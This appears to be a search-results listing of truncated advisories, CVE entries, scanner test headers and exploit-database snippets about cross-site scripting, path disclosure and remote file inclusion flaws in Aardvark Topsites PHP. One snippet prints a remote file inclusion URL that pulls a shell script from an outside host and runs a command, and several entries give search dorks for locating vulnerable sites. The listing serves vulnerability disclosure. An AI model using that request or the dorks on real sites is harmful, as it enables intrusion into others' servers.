33 matches found
Aardvark Topsites PHP 5.2 Cross Site Scripting / Local File Inclusion
Aardvark Topsites PHP 5.2 Multi Vulnerability ============================================= Author : indoushka Vondor : www.p30vel.ir http://www.aardvarktopsitesphp.com/ http://www.avatic.com/ Dork : My Topsites List - Powered by Aardvark Topsites PHP 5.2.1 ======================================...
Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln
No description provided by source. Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: Powered By Aardvark Topsites PHP 4.2.2 Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com 2006-04-...
Aardvark Topsites PHP <= 4.2.2 (lostpw.php) Remote Include Exploit
No description provided by source. !/usr/bin/perl Aardvark Topsites PHP =4.2.2 Remote Command Execution Exploit Copyright c 2006 cijfer cijfer@netti!fi All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ to set your PHP shell...
Aardvark Topsites 4.1 PHP Multiple Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/9231/info Multiple vulnerabilities have been identified in the software that include information disclosure, path disclosure, SQL injection, and a plaintext password weakness. Aardvark Topsites PHP version 4.1.0 has been...
Aardvark Topsites PHP 'index.php' Multiple Cross Site Scripting Vulnerabilities
This host is running Aardvark Topsites PHP CMS and is prone to cross site scripting vulnerabilities. OpenVAS Vulnerability Test $Id: gbaardvarktopsitesphpcmsxssvuln.nasl 5676 2017-03-22 16:29:37Z cfi $ Aardvark Topsites PHP 'index.php' Multiple Cross Site Scripting Vulnerabilities Authors: Antu...
Aardvark Topsites PHP 'index.php' Multiple Cross Site Scripting Vulnerabilities
Aardvark Topsites PHP CMS is prone to cross site scripting vulnerabilities. SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in index.php in Aardvark Topsites PHP 5.2.0 and 5.2.1 allow remote attackers to inject arbitrary web script or HTML via the 1 mail, 2 title, 3 u, and 4 url parameters. NOTE: the q parameter is already covered by CVE-2009-2302...
CVE-2010-4097
CVE-2010-4097 concerns Aardvark Topsites PHP versions 5.2.0 and 5.2.1, where multiple XSS flaws in index.php allow remote attackers to inject arbitrary scripts via the mail, title, u, and url parameters (the q parameter is covered by CVE-2009-2302). This Open Web vulnerability set confirms the af...
CVE-2010-4097
Multiple cross-site scripting XSS vulnerabilities in index.php in Aardvark Topsites PHP 5.2.0 and 5.2.1 allow remote attackers to inject arbitrary web script or HTML via the 1 mail, 2 title, 3 u, and 4 url parameters. NOTE: the q parameter is already covered by CVE-2009-2302...
CVE-2009-2303
index.php in Aardvark Topsites PHP 5.2.1 and earlier allows remote attackers to obtain sensitive information via a negative integer value for the start parameter in a search action, which reveals the installation path in an error message...
Design/Logic Flaw
index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to obtain sensitive information via a nonexistent account name in the u parameter in a rate action, which reveals the installation path in an error message...
CVE-2009-2304
index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to obtain sensitive information via a nonexistent account name in the u parameter in a rate action, which reveals the installation path in an error message...
Cross site scripting
Cross-site scripting XSS vulnerability in index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action. NOTE: it was later reported that 5.2.1 is also affected...
CVE-2009-2302
Cross-site scripting XSS vulnerability in index.php in Aardvark Topsites PHP 5.2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action. NOTE: it was later reported that 5.2.1 is also affected...
CVE-2009-2303
CVE-2009-2303 affects Aardvark Topsites PHP 5.2.1 and earlier. The vulnerability resides in index.php during a search action, where a negative integer value for the start parameter can trigger an error message that reveals the installation path. This leads to an information disclosure risk (parti...
CVE-2009-2303
index.php in Aardvark Topsites PHP 5.2.1 and earlier allows remote attackers to obtain sensitive information via a negative integer value for the start parameter in a search action, which reveals the installation path in an error message...
CVE-2009-2302
CVE-2009-2302 describes a cross-site scripting (XSS) vulnerability in the PHP index.php of Aardvark Topsites PHP. The issue allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action for versions 5.2.0 and earlier, with 5.2.1 also reported as affected. T...
Aardvark Topsites PHP 5.2 - index.php Cross-Site Scripting
Aardvark Topsites PHP 5.2 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/35506/info Aardvark Topsites PHP is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in th...
Aardvark Topsites PHP 5.2 - 'index.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/35506/info Aardvark Topsites PHP is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based...
Reporting new vulnerabilities
Hi SecurityVulns team, I write to report three vulnerabilities that I found in the last version of Aardvark Topsites PHP5.2.1 and older versions. The cause of all of them is the incorrect verification of input parameters. Here are the vulnerabilities: ================== HTML Injection up to 5.2.0...